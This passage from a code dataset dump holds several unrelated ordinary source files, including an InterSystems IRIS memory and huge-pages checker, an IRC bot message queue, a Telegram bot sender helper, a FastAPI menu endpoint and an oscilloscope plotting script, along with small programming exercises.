\"\n )\n else:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"swappiness is {sp_dict['swappiness']}\"\n\n # memory comes from Linux free or from Windows info\n\n if \"memlock\" in sp_dict:\n if int(sp_dict[\"memlock\"]) == 0:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"memlock={sp_dict['memlock']} does not enforce Huge/Large pages\"\n\n if \"memory MB\" in sp_dict:\n\n huge_page_size_kb = 2048\n\n sp_dict[\"memory GB\"] = f\"{round(int(sp_dict['memory MB']) / 1024)}\"\n\n # Basic shared memory calculation\n sp_dict[\"shared memory MB\"] = (\n sp_dict[\"globals total MB\"] + sp_dict[\"routines total MB\"] + round(int(sp_dict[\"gmheap\"]) / 1024)\n )\n sp_dict[\n \"shared memory calc\"\n ] = f\"globals {sp_dict['globals total MB']} MB + routines {sp_dict['routines total MB']} MB + gmheap {round(int(sp_dict['gmheap']) / 1024)} MB\"\n\n # Estimate total shared memory (e.g. for huge pages) based on 2022.1 calculations\n all_present = False\n if \"routines total MB\" in sp_dict:\n routine_buffers_mb = int(sp_dict[\"routines total MB\"])\n if \"gmheap\" in sp_dict:\n gmheap_in_mb = int(int(sp_dict[\"gmheap\"]) / 1024)\n if \"number cpus\" in sp_dict:\n number_of_logical_cpus = int(sp_dict[\"number cpus\"])\n if \"jrnbufs\" in sp_dict:\n jrnbufs_in_mb = int(sp_dict[\"jrnbufs\"])\n if \"MaxServerConn\" in sp_dict:\n MaxServerConn = int(sp_dict[\"MaxServerConn\"])\n if \"MaxServers\" in sp_dict:\n MaxServers = int(sp_dict[\"MaxServers\"])\n if \"globals total MB\" in sp_dict:\n global_buffers_mb = int(sp_dict[\"globals total MB\"])\n all_present = True\n\n if all_present:\n total_shared_memory = shared_memory_estimate(\n global_buffers_mb,\n routine_buffers_mb,\n gmheap_in_mb,\n number_of_logical_cpus,\n jrnbufs_in_mb,\n MaxServerConn,\n MaxServers,\n )\n\n sp_dict[\"Estimated total IRIS shared memory\"] = total_shared_memory\n sp_dict[\"Estimated total IRIS shared memory text\"] = (\n f\"Estimated total shared memory (MB):\\n\"\n f\"[global buffers in MB] * 1.08 + [routine buffers in MB] * 1.02 + [gmheap in MB] + \\n\"\n f\" 2 * [number of logical CPUs] + [jrnbufs in MB] + 2 * ( [MaxServerConn] + [MaxServers]) + \"\n f\"300 [overall fixed padding]\\n\\n\"\n f\"[{global_buffers_mb}] * 1.08 + [{routine_buffers_mb}] * 1.02 + [{gmheap_in_mb}] + \\n\"\n f\" 2 * [{number_of_logical_cpus}] + [{jrnbufs_in_mb}] + 2 * ( [{MaxServerConn}] + [{MaxServers}]) + \"\n f\"300 [overall fixed padding]\\n\\n\"\n f\"See https://docs.intersystems.com/irislatest/csp/docbook/DocBook.UI.Page.cls\"\n f\"?KEY=ARES#ARES_memory_plan_estimate\\n\"\n )\n\n sp_dict[\"75pct memory MB\"] = round(int(sp_dict[\"memory MB\"]) * 0.75)\n sp_dict[\"75pct memory number huge pages\"] = round((sp_dict[\"75pct memory MB\"] * 1024) / huge_page_size_kb)\n\n if \"vm.nr_hugepages\" in sp_dict:\n\n if int(sp_dict[\"vm.nr_hugepages\"]) == 0:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = (\n f\"HugePages are not set. Consider huge page memory space for production instances to improve \"\n f\"performance and efficiency and to protect the shared memory from paging out. 
\"\n f\"Specifying HugePages much higher than the shared memory amount is not advisable because the \"\n f\"unused memory is not available to other components.\"\n )\n\n recommend_count += 1\n sp_dict[f\"recommend {recommend_count}\"] = (\n f\"Set HugePages, see IRIS documentation: \"\n f\"https://docs.intersystems.com/irislatest/csp/docbook/Doc.View\"\n f\".cls?KEY=GCI_prepare_install#GCI_memory_big_linux \"\n )\n\n recommend_count += 1\n msg = f\"Total memory is {int(sp_dict['memory MB']):,} MB, 75% of total memory is {int(sp_dict['75pct memory MB']):,} MB.\"\n sp_dict[f\"recommend {recommend_count}\"] = msg\n\n recommend_count += 1\n msg = (\n f\"Shared memory (globals+routines+gmheap+other) is {sp_dict['shared memory MB']:,} MB. \"\n f\"({round((sp_dict['shared memory MB'] / int(sp_dict['memory MB'])) * 100):,}% of total memory).\"\n )\n sp_dict[f\"recommend {recommend_count}\"] = msg\n\n recommend_count += 1\n # If all the info for full estimate use that, else ballpark\n if \"Estimated total IRIS shared memory\" in sp_dict:\n msg = (\n f\"Number of HugePages for {huge_page_size_kb} KB page size for {sp_dict['Estimated total IRIS shared memory']:,} MB \"\n f\"is {round((sp_dict['Estimated total IRIS shared memory'] * 1024) / huge_page_size_kb)}\"\n )\n else:\n shared_memory_plus_8pct = round(sp_dict[\"shared memory MB\"] * 1.08)\n msg = (\n f\"Number of HugePages for {huge_page_size_kb} KB page size for ({sp_dict['shared memory MB']:,} MB + 8% buffer = {shared_memory_plus_8pct:,} MB) \"\n f\"is {round((shared_memory_plus_8pct * 1024) / huge_page_size_kb)}\"\n )\n\n sp_dict[f\"recommend {recommend_count}\"] = msg\n\n if \"max locked memory\" in sp_dict:\n if sp_dict[\"max locked memory\"].isdigit():\n if int(sp_dict[\"max locked memory\"]) < 100:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = (\n f\"max locked memory {sp_dict['max locked memory']} kb too \"\n f\"small to lock shared memory segment in memory without huge \"\n f\"pages (see ulimit -a) \"\n )\n\n # Huge pages is specified, validate\n else:\n sp_dict[\"hugepages MB\"] = round(int(sp_dict[\"vm.nr_hugepages\"]) * huge_page_size_kb / 1024)\n\n if sp_dict[\"hugepages MB\"] < sp_dict[\"shared memory MB\"]:\n warn_count += 1\n sp_dict[\n f\"warning {warn_count}\"\n ] = f\"shared memory is {sp_dict['shared memory MB']:,} MB hugepages is {sp_dict['hugepages MB']:,} MB\"\n else:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"HugePages is set:\"\n pass_count += 1\n msg = f\"Total memory is {int(sp_dict['memory MB']):,} MB. \"\n sp_dict[f\"pass {pass_count}\"] = msg\n\n pass_count += 1\n msg = (\n f\"75% of total memory is {int(sp_dict['75pct memory MB']):,} MB. \"\n f\"Shared memory is {sp_dict['shared memory MB']:,}, {round(sp_dict['shared memory MB'] / int(sp_dict['memory MB']) * 100):,}% of total memory.\"\n )\n sp_dict[f\"pass {pass_count}\"] = msg\n\n pass_count += 1\n msg = (\n f\"Shared memory (globals+routines+gmheap+other) is {sp_dict['shared memory MB']:,} MB, hugepages is {sp_dict['hugepages MB']:,} MB, \"\n f\"gap is {sp_dict['hugepages MB'] - sp_dict['shared memory MB']:,} MB. 
\"\n f\"Shared memory is {round((sp_dict['shared memory MB']) / int(sp_dict['hugepages MB']) * 100):,}% of huge pages.\"\n )\n sp_dict[f\"pass {pass_count}\"] = msg\n\n if \"kernel.shmmax\" in sp_dict:\n\n if int(sp_dict[\"kernel.shmmax\"]) == 18446744073692774399:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"Kernel shared memory limit is at default\"\n else:\n if \"hugepages MB\" in sp_dict:\n if int(sp_dict[\"kernel.shmmax\"]) < sp_dict[\"hugepages MB\"] * 1024 * 1024:\n warn_count += 1\n sp_dict[\n f\"warning {warn_count}\"\n ] = f\"Kernel shared memory limit must be higher than hugepages.\"\n else:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"Kernel shared memory limit is higher than hugepages\"\n\n # dirty_* parameters are not relevant if using async IO – which any IRIS-based install should be.\n # A better question is async io set?\n # if \"vm.dirty_background_ratio\" in sp_dict:\n # if int(sp_dict[\"vm.dirty_background_ratio\"]) > 5:\n # warn_count += 1\n # sp_dict[\n # f\"warning {warn_count}\"] = f\"dirty_background_ratio is {sp_dict['vm.dirty_background_ratio']}. InterSystems recommends setting this parameter to 5. This setting is the maximum percentage of active memory that can be filled with dirty pages before pdflush begins to write them.\"\n # else:\n # pass_count += 1\n # sp_dict[f\"pass {pass_count}\"] = f\"dirty_background_ratio is {sp_dict['vm.dirty_background_ratio']}\"\n #\n # if \"vm.dirty_ratio\" in sp_dict:\n # if int(sp_dict[\"vm.dirty_ratio\"]) > 10:\n # warn_count += 1\n # sp_dict[\n # f\"warning {warn_count}\"] = f\"dirty_ratio is {sp_dict['vm.dirty_ratio']}. InterSystems recommends setting this parameter to 10. This setting is the maximum percentage of total memory that can be filled with dirty pages before processes are forced to write dirty buffers themselves during their time slice instead of being allowed to do more writes. 
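# The two kernel checks above reduce to a pair of small helpers: convert
# vm.nr_hugepages to MB (again assuming 2048 KB pages) and confirm that
# kernel.shmmax is at least as large as the huge-page pool. The constant below is
# the default value the code compares against (effectively unlimited on Linux).

SHMMAX_DEFAULT = 18446744073692774399


def hugepages_mb(nr_hugepages, huge_page_size_kb=2048):
    return round(nr_hugepages * huge_page_size_kb / 1024)


def shmmax_covers_hugepages(shmmax_bytes, hugepages_in_mb):
    if shmmax_bytes == SHMMAX_DEFAULT:
        return True  # left at the default, no practical limit
    return shmmax_bytes >= hugepages_in_mb * 1024 * 1024

# hugepages_mb(5400) -> 10800; shmmax must then be >= 10800 * 1024 * 1024 bytes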
These changes force the Linux pdflush daemon to write out dirty pages more often rather than queue large amounts of updates that can potentially flood the storage with a large burst of updates\"\n # else:\n # pass_count += 1\n # sp_dict[f\"pass {pass_count}\"] = f\"dirty_ratio is {sp_dict['vm.dirty_ratio']}\"\n\n # Debug\n\n # for key in sp_dict:\n # print(f\"{key} : {sp_dict[key]}\")\n\n # Some tidy up if empty\n\n if \"platform\" not in sp_dict:\n sp_dict[\"platform\"] = \"N/A\"\n if \"shared memory calc\" not in sp_dict:\n sp_dict[\"shared memory calc\"] = \"\"\n if \"shared memory MB\" not in sp_dict:\n sp_dict[\"shared memory MB\"] = 0\n hostname = \"N/A\"\n if \"linux hostname\" in sp_dict:\n hostname = sp_dict[\"linux hostname\"]\n if \"windows host name\" in sp_dict:\n hostname = sp_dict[\"windows host name\"]\n\n # Build log\n\n log = f\"System Summary for {sp_dict['customer']}\\n\\n\"\n log += f\"Hostname : {hostname}\\n\"\n log += f\"Instance : {sp_dict['instance']}\\n\"\n\n log += f\"Operating system : {sp_dict['operating system']}\\n\"\n log += f\"Platform : {sp_dict['platform']}\\n\"\n log += f\"CPUs : {sp_dict['number cpus']}\\n\"\n if sp_dict[\"operating system\"] == \"AIX\" and \"AIX SMT\" in sp_dict:\n log += f\"SMT : {sp_dict['AIX SMT']}\\n\"\n log += f\"Processor model : {sp_dict['processor model']}\\n\"\n log += f\"Memory : {sp_dict['memory GB']} GB\\n\"\n log += f\"Shared memory : {sp_dict['shared memory calc']} = {int(sp_dict['shared memory MB']):,} MB\\n\"\n log += f\"Version : {sp_dict['version string']}\\n\"\n log += f\"Date collected : {sp_dict['profile run']}\\n\"\n\n first_pass = True\n for key in sp_dict:\n if \"pass\" in key:\n if first_pass:\n log += \"\\nPasses:\\n\"\n first_pass = False\n log += f\"- {sp_dict[key]}\\n\"\n\n first_warning = True\n for key in sp_dict:\n if \"warn\" in key:\n if first_warning:\n log += \"\\nWarnings:\\n\"\n first_warning = False\n log += f\"- {sp_dict[key]}\\n\"\n\n recommendations_count = False\n log += \"\\nRecommendations:\\n\"\n\n if not first_warning:\n log += f\"- Review and fix warnings above\\n\"\n\n for key in sp_dict:\n if \"recommend\" in key:\n recommendations_count = True\n log += f\"- {sp_dict[key]}\\n\"\n\n if not recommendations_count and first_warning:\n log += f\"- No recommendations\\n\"\n\n first_instance = True\n for key in sp_dict:\n if \"up instance\" in key:\n if first_instance:\n log += \"\\nAll instances on this host:\\n\"\n first_instance = False\n log += f\"- {sp_dict[key]}\\n\"\n\n log += \"\\nStorage:\\n\"\n\n log += f\"Current journal : {sp_dict['current journal']}\\n\"\n log += f\"Alternate journal : {sp_dict['alternate journal']}\\n\"\n log += f\"Days before purge : {sp_dict['DaysBeforePurge']}\\n\"\n if \"wijdir\" in sp_dict:\n log += f\"WIJ directory : {sp_dict['wijdir']}\\n\"\n\n log += \"\\nAdditional:\\n\"\n if \"IRISSYS\" in sp_dict:\n log += f\"IRISSYS : {sp_dict['IRISSYS']}\\n\"\n if \"CACHESYS\" in sp_dict:\n log += f\"CACHESYS : {sp_dict['CACHESYS']}\\n\"\n\n first_dev_mapper = True\n for key in sp_dict:\n if \"dev mapper\" in key:\n if first_dev_mapper:\n log += \"\\n/dev/mapper:\\n\"\n first_dev_mapper = False\n log += f\"{sp_dict[key]}\\n\"\n\n first_filesystem = True\n for key in sp_dict:\n if \"filesystem df\" in key:\n if first_filesystem:\n log += \"\\nFilesystem (df):\\n\"\n first_filesystem = False\n log += f\"{sp_dict[key]}\\n\"\n\n if \"Estimated total IRIS shared memory\" in sp_dict:\n log += 
f\"\\n--------------------------------------------------------------------------------------------------\\n\"\n log += f\"Estimated total shared memory for IRIS 2022.1 and later: \"\n log += f\"{int(sp_dict['Estimated total IRIS shared memory']):,} (MB)\\n\\n\"\n log += f'{sp_dict[\"Estimated total IRIS shared memory text\"]}\\n'\n\n if \"hugepages MB\" in sp_dict and \"memory MB\" in sp_dict:\n if sp_dict[\"hugepages MB\"] < sp_dict[\"Estimated total IRIS shared memory\"]:\n log += f\"Warning:\\n\"\n log += f\"Estimated shared memory is {sp_dict['Estimated total IRIS shared memory']:,} MB, \"\n log += f\"hugepages is {sp_dict['hugepages MB']:,} MB\\n\\n\"\n\n log += f\"Total memory is {int(sp_dict['memory MB']):,} MB.\\n\"\n log += (\n f\"75% of total memory is {int(sp_dict['75pct memory MB']):,} MB. \"\n f\"Estimated shared memory is {sp_dict['Estimated total IRIS shared memory']:,}, \"\n f\"{round(sp_dict['Estimated total IRIS shared memory'] / int(sp_dict['memory MB']) * 100):,}% \"\n f\"of total memory.\\n\"\n )\n log += (\n f\"Estimated shared memory (globals+routines+gmheap+other) is {sp_dict['Estimated total IRIS shared memory']:,} MB\"\n f\", hugepages is {sp_dict['hugepages MB']:,} MB, \"\n f\"gap is {sp_dict['hugepages MB'] - sp_dict['Estimated total IRIS shared memory']:,} MB. \"\n f\"Shared memory is \"\n f\"{round((sp_dict['Estimated total IRIS shared memory']) / int(sp_dict['hugepages MB']) * 100):,}\"\n f\"% of huge pages.\\n\"\n )\n log += (\n f\"Current shared memory (from ipcs -m) is \"\n f\"{int(sp_dict['Shared memory segment total']/1024/1024):,} MB\"\n f\", hugepages is {sp_dict['hugepages MB']:,} MB, \"\n f\"gap is {sp_dict['hugepages MB'] - int(sp_dict['Shared memory segment total']/1024/1024):,} MB. \"\n f\"Shared memory is \"\n f\"{round((int(sp_dict['Shared memory segment total']/1024/1024))/int(sp_dict['hugepages MB']) * 100):,}\"\n f\"% of huge pages.\\n\\n\"\n )\n\n log += f\"Note:\\n\"\n log += f\"Estimated shared memory only accounts for IRIS. \"\n log += f\"Other components such as JVM for reports are not included.\\n\"\n\n log += f\"Confirm Huge Pages setting on the first IRIS startup. 
Especially for instances with low RAM.\"\n log += f\" Adjust global buffers down if needed.\\n\"\n log += f\"Start IRIS with all your CPF parameters set to desired values without HugePages allocated, record \"\n log += f\"the total shared memory segment size from the messages.log,\\nand then use that as the figure for \"\n log += f\"calculating/allocating HugePages and then restart IRIS.\\n\"\n\n first_shared_memory = True\n for key in sp_dict:\n if \"Shared memory ipcs\" in key:\n if first_shared_memory:\n log += \"\\nShared memory from ipcs -m:\\n\"\n first_shared_memory = False\n log += f\"{sp_dict[key]}\\n\"\n\n log += \"\\nEnd of report.\"\n\n yaspe_yaml = \"yaspe:\\n\"\n yaspe_yaml += f\" Site: {sp_dict['customer'].replace(':','-')}\\n\"\n yaspe_yaml += f\" Hostname: {hostname}\\n\"\n yaspe_yaml += f\" Instance: {sp_dict['instance']}\\n\"\n\n yaspe_yaml += f\" Operating system: {sp_dict['operating system']}\\n\"\n yaspe_yaml += f\" Platform: {sp_dict['platform']}\\n\"\n yaspe_yaml += f\" CPUs: {sp_dict['number cpus']}\\n\"\n\n yaspe_yaml += f\" Processor model: {sp_dict['processor model'].replace(':','-')}\\n\"\n yaspe_yaml += f\" Memory: {sp_dict['memory GB']} GB\\n\"\n yaspe_yaml += f\" Shared memory: {sp_dict['shared memory calc']} = {int(sp_dict['shared memory MB']):,} MB\\n\"\n yaspe_yaml += f\" Version: {sp_dict['version string'].replace(':','-')}\\n\"\n yaspe_yaml += f\" Date collected: {sp_dict['profile run'].replace(':','-')}\\n\"\n\n return log, yaspe_yaml\n","repo_name":"murrayo/yaspe","sub_path":"sp_check.py","file_name":"sp_check.py","file_ext":"py","file_size_in_byte":34128,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15725746026","text":"# Faça um programa que peça dois números, base e expoente, calcule e\n# mostre o primeiro número elevado ao segundo número. 
Não utilize a função\n# de potência da linguagem\n\nn1 = int(input(\"Digite um número: \"))\nn2 = int(input(\"Digite outro número: \"))\ncount = 1\n\nwhile n2 > 0:\n count = count * n1\n n2-= 1\n\nprint(count)","repo_name":"nascimentolds/IFPE","sub_path":"ADS/1-PERIODO/LP/20230309/20230309-ex5.py","file_name":"20230309-ex5.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38547649534","text":"import asyncio\n\nfrom typing import Union, Optional\n\nfrom aiogram import Bot\nfrom aiogram.types import (\n CallbackQuery,\n Message,\n FSInputFile,\n UNSET_PARSE_MODE,\n InlineKeyboardMarkup\n)\n\nfrom usefulgram.exceptions import MessageTooOld\nfrom usefulgram.lazy.sender import MessageSender\nfrom usefulgram.lazy.stable_wait import StableWaiter\nfrom usefulgram.lazy.callback_responder import CallbackAnswer\n\n\nclass LazySender:\n _event: Union[CallbackQuery, Message]\n _bot: Bot\n _stable: bool\n\n def __init__(\n self,\n event: Union[CallbackQuery, Message],\n bot: Bot,\n stable: bool = False\n ):\n\n self._event = event\n self._bot = bot\n self._stable = stable\n\n @staticmethod\n def get_empty_text() -> str:\n spaces = \" ⁣\" * 65\n\n return f\"⁣{spaces}⁣\"\n\n async def send(\n self,\n text: Optional[str] = None,\n photo: Optional[FSInputFile] = None,\n video: Optional[FSInputFile] = None,\n reply_markup: Optional[InlineKeyboardMarkup] = None,\n parse_mode: Union[str] = UNSET_PARSE_MODE,\n disable_web_page_preview: bool = False,\n answer_text: Optional[str] = None,\n answer_show_alert: bool = False,\n autoanswer: bool = True\n ) -> Message:\n \"\"\"\n Smart send menager\n\n :param text:\n :param photo:\n :param video:\n :param reply_markup:\n :param parse_mode:\n :param disable_web_page_preview:\n :param answer_text:\n :param answer_show_alert:\n :param autoanswer:\n :return:\n \"\"\"\n\n if isinstance(self._event, CallbackQuery):\n if self._event.message is None:\n await self._event.answer(\"Message too old\")\n\n raise MessageTooOld\n\n chat_id = self._event.message.chat.id\n thread_id = self._event.message.message_thread_id\n dt = self._event.message.date\n\n else:\n chat_id = self._event.chat.id\n thread_id = self._event.message_thread_id\n dt = self._event.date\n\n if self._stable:\n await asyncio.sleep(StableWaiter.get_stable_wait_time(dt))\n\n if text is None:\n text = self.get_empty_text()\n\n result = await MessageSender.send(\n bot=self._bot,\n chat_id=chat_id,\n text=text,\n message_thread_id=thread_id,\n photo=photo,\n video=video,\n reply_markup=reply_markup,\n parse_mode=parse_mode,\n disable_web_page_preview=disable_web_page_preview\n )\n\n if isinstance(self._event, CallbackQuery):\n await CallbackAnswer.auto_callback_answer(\n bot=self._bot,\n callback_id=self._event.id,\n autoanswer=autoanswer,\n answer_text=answer_text,\n answer_show_alert=answer_show_alert\n )\n\n return result\n","repo_name":"Sethis/usefulgram","sub_path":"usefulgram/lazy/lazy_sender.py","file_name":"lazy_sender.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10487998606","text":"import os\nfrom pbthread import PBThread\nfrom actionqueue import ActionQueue\n\n\nclass OutboundMessageThread(PBThread):\n ''' If the bot is going to send a message/command to the IRC server, it\n must do so through this class.\n\n Use the add() function to add an outbound message/command. 
For example, to\n privmsg the user 'pastly':\n\n >>> omt = outbound_message_thread\n >>> omt.add(omt.privmsg, ['pastly', 'I dont like sand'])\n\n More generally, specify the function you want to call as the first argument\n to add(), any arguments you want to pass to it in as a list, and finally\n any keyword arguments you want to pass to it as a dictionary.\n '''\n\n def __init__(self, global_state,\n long_timeout=5, time_between_actions_func=None):\n PBThread.__init__(self, self._enter, name='OutboundMessage')\n self._action_queue = \\\n ActionQueue(long_timeout=long_timeout,\n time_between_actions_func=time_between_actions_func)\n self.update_global_state(global_state)\n\n def update_global_state(self, gs):\n self._log = gs['log']\n self._conf = gs['conf']\n self._server_dir = os.path.join(\n gs['conf']['ii']['ircdir'], gs['conf']['ii']['server'])\n self._end_event = gs['events']['kill_outmessage']\n\n def _enter(self):\n log = self._log\n log.info('Started OutboundMessageThread instance')\n while not self._end_event.is_set():\n self._action_queue.loop_once()\n self._shutdown()\n\n def _shutdown(self):\n log = self._log\n log.info('OutboundMessageThread going away')\n\n def add(self, *args, **kwargs):\n ''' Use this function to add outbound messages/commands.\n\n The args and kwargs arguments in this function do NOT correspond to\n the args and kwargs that get passed to the member function. They are\n a very confusing way to give OutboundMessageThread.add the same\n signature as ActionQueue.add.\n\n All of the following should be equivalent and result in the same thing.\n They should all result in OutboundMessageThread.servmsg getting the\n message 'hi mom' and log_it set to False, and the function call will\n be added to our ActionQueue with priority 55.\n\n >>> omt.add(omt.servmsg,\n args=['hi mom'],\n kwargs={'log_it': False},\n priority=55)\n >>> omt.add(omt.servmsg,\n ['hi mom'],\n {'log_it': False},\n priority=55)\n >>> omt.add(omt.servmsg,\n ['hi mom'],\n kwargs={'log_it': False},\n 55)\n '''\n self._action_queue.add(*args, **kwargs)\n\n def servmsg(self, message, log_it=False):\n ''' Do not call this function directly. Pass it as an argument to add()\n\n >>> omt = outbound_message_thread\n >>> omt.add(omt.servmsg, ['/mode #foo +i'])\n '''\n if log_it and False:\n self._log.notice('Sending:', message)\n fname = os.path.join(self._server_dir, 'in')\n try:\n with open(fname, 'w') as server_in:\n while True:\n try:\n server_in.write('{}\\n'.format(message))\n except BrokenPipeError as e:\n log.warn(e, 'trying again in 0.1s')\n time.sleep(0.1)\n continue\n else:\n break\n except BrokenPipeError as e:\n self._log.warn(e, 'will not try again')\n\n def privmsg(self, nick, message, **kwargs):\n ''' Do not call this function directly. Pass it as an argument to add()\n\n >>> omt = outbound_message_thread\n >>> omt.add(omt.privmsg, ['pastly', 'You left the stove on'])\n '''\n self.servmsg('/privmsg {} {}'.format(nick, message), **kwargs)\n\n def notice(self, target, message, **kwargs):\n ''' Do not call this function directly. 
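# The retry loop in servmsg() above refers to `log` and `time`, neither of which is
# defined or imported in this excerpt (the class logger is self._log). A
# self-contained sketch of the same idea, write one line to ii's `in` FIFO and
# retry briefly on a broken pipe, with an illustrative path in the usage note:

import os
import time


def write_to_ircd_fifo(server_dir, message, retries=3, delay=0.1):
    """Append one command/message line to ii's `in` FIFO, retrying on BrokenPipeError."""
    fname = os.path.join(server_dir, "in")
    for attempt in range(retries):
        try:
            with open(fname, "w") as server_in:
                server_in.write("{}\n".format(message))
            return True
        except BrokenPipeError:
            if attempt + 1 < retries:
                time.sleep(delay)  # the ii reader may be restarting; wait and retry
    return False

# write_to_ircd_fifo("/tmp/irc/chat.example.net", "/privmsg pastly hello")  # path is illustrative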
Pass it as an argument to add()\n\n >>> omt = outbound_message_thread\n >>> omt.add(omt.notice, ['#foobar', 'Promise this isnt spam'])\n '''\n self.servmsg('/notice {} {}'.format(target, message), **kwargs)\n","repo_name":"pastly/tor-ircbot","sub_path":"outboundmessagethread.py","file_name":"outboundmessagethread.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43022042205","text":"class Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n start = 0\n end = len(numbers)-1\n \n while start < end:\n sum = numbers[start] + numbers[end]\n if sum == target:\n return [start+1, end+1]\n elif sum < target:\n start += 1\n else:\n end -= 1\n return [] \n \n #two pointer不斷移動左指針 調整又指針 向中間移相等即可\n #有備註說明Your returned answers (both index1 and index2) are not zero-based,若習慣從0開始,所以最後return再加一也可 [start+1, end+1]\n \n \n \n \n'''\nLeetcode-Easy\n167. Two Sum II - Input array is sorted\nRuntime: 64 ms, faster than 68.77%\n\nsorted in ascending order 上升排序\n\n'''\n","repo_name":"kaitlynning/Py-practice","sub_path":"167. Two Sum II - Input array is sorted.py","file_name":"167. Two Sum II - Input array is sorted.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33264112932","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom fastapi.middleware.cors import CORSMiddleware #imports middelware for handling CORS\n\napp = FastAPI()\n\n#calls middleware that handles cors\n#the * declaration says that all origins are allowed\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['*']\n)\n\nclass Msg(BaseModel):\n msg: str\n\n\nmenuitems = [ {\n \"char_id\": 1,\n \"itemName\": \"Pork Belly Noodle Bowl\",\n \"price\": \"$24.00\",\n \"img\": \"https://media-cdn.tripadvisor.com/media/photo-m/1280/18/cd/03/93/pork-belly-noodle-bowl.jpg\",\n \"ingredients\": \"Noodles, Pork Belly, Broth\",\n \"allergens\": \"gluten, eggs, soy\",\n},\n{\n \"char_id\": 2,\n \"itemName\": \"Asian-marinated Airline Chicken\",\n \"price\": \"$24.00\",\n \"img\": \"https://media.wdwnt.com/2019/10/new-kona-cafe-menu-sticky-wings-airplane-chicken-polynesian-resort_17-1200x675.jpg\",\n \"ingredients\": \"Sticky Rice, Bok Choy, Asian Glaze\",\n \"allergens\": \"dairy, soy\",\n},\n{\n \"char_id\": 3,\n \"itemName\": \"Turkey Banh Mi\",\n \"price\": \"$18.00\",\n \"img\": \"https://i1.wp.com/www.wdwopinion.com/wp-content/uploads/2020/01/IMG_8386-scaled.jpg?fit=1024%2C768&ssl=1\",\n \"ingredients\": \"Slow-roasted Turkey Breast, Black Pepper Bacon, Pork Pâte, Cilantro, Jalapeño, Onions, and Grilled Poblano Mayonnaise served with French Fries\",\n \"allergens\": \"gluten, dairy\",\n},\n]\n\n@app.get('/')\n\nasync def read_root():\n return menuitems","repo_name":"alindo001/python_API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25147045933","text":"# Module imports\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport matplotlib.animation as animation\n\nimport niscope\n\n# Plot default configurations\nplt.rcParams[\"figure.figsize\"] = [7.50, 3.50]\nplt.rcParams[\"figure.autolayout\"] = True\n\n# Creation of plot figure and axis\nfig, ax = plt.subplots()\n\n# Number of samples to be read\nnum_samples = 250\n\ndef 
update_samples(waveforms):\n \"\"\"Function used to read from the scope, and constantly update the samples array\"\"\"\n samples = []\n # The 'samples' attribute returns a memory address. To get the samples list, iterate over waveforms[0].samples and append them to a new list\n for sample in waveforms[0].samples: # waveforms[0] corresponds to the first, and only in this example, waveform in the list\n samples.append(sample)\n return samples\n\ndef animate(i):\n \"\"\"Function which constantly reads waveform samples and updates the plot\"\"\"\n waveforms = session.channels[\"1\"].read(num_samples=num_samples)\n line.set_ydata(update_samples(waveforms=waveforms))\n return line,\n\nwith niscope.Session(resource_name='PXIe5160', options={}) as session:\n # Scope configuration\n session.configure_vertical(range=5.0, coupling=niscope.VerticalCoupling.AC)\n session.configure_horizontal_timing(min_sample_rate=50000000, min_num_pts=num_samples, ref_position=50.0, num_records=1, enforce_realtime=True)\n\n # Read and store waveform. Read() returns a list of waveforms, with each channel being an element of the list\n # The elements within each channel are WaveformInfo class instances, with attributes that can be accessed\n waveforms = session.channels[\"1\"].read(num_samples=num_samples)\n\n # The x_increment attribute returns the delta-t (dt) of the waveform. Multiplying this by a range of num_samples ensures that both x and y axes have the same length\n x_time = [waveforms[0].x_increment * x for x in range(num_samples)]\n\n # line object which will be used as a return value for the plot animation\n line, = ax.plot(x_time, update_samples(waveforms=waveforms))\n\n # Plot configuration\n ax.xaxis.set_major_formatter(ticker.EngFormatter(unit=\"s\"))\n ax.yaxis.set_major_formatter(ticker.EngFormatter(unit=\"V\"))\n ax.set_xlabel('Time (s)')\n ax.set_ylabel('Voltage (V)')\n ax.grid()\n\n # Below object is used to iterate over the animate() function and constantly update the plot\n ani = animation.FuncAnimation(fig, animate, interval=100, blit=True, save_count=50)\n\n plt.title(label=\"Waveform Graph\")\n plt.show()\n\n session.abort()\n","repo_name":"Seralfesp/nidriver-python-examples","sub_path":"src/niscope/niScope Continuously Update Graph.py","file_name":"niScope Continuously Update Graph.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41024738648","text":"from datetime import datetime\n\nimport pytz\nimport structlog\nfrom feedgen.feed import FeedGenerator\nfrom flask import Blueprint, Response, current_app, request\nfrom redis import StrictRedis\n\nfrom inspirehep.mailing.api.jobs import subscribe_to_jobs_weekly_list\nfrom inspirehep.serializers import jsonify\n\nfrom .loaders import JobsWeeklySubscribeSchema\n\nLOGGER = structlog.getLogger()\n\nblueprint = Blueprint(\n \"inspirehep_mailing\", __name__, template_folder=\"templates\", url_prefix=\"/mailing\"\n)\n\n\n@blueprint.route(\"/subscribe/jobs/weekly\", methods=[\"POST\"])\ndef subscribe_jobs_weekly():\n try:\n data = request.get_json()\n result = JobsWeeklySubscribeSchema().load(data)\n 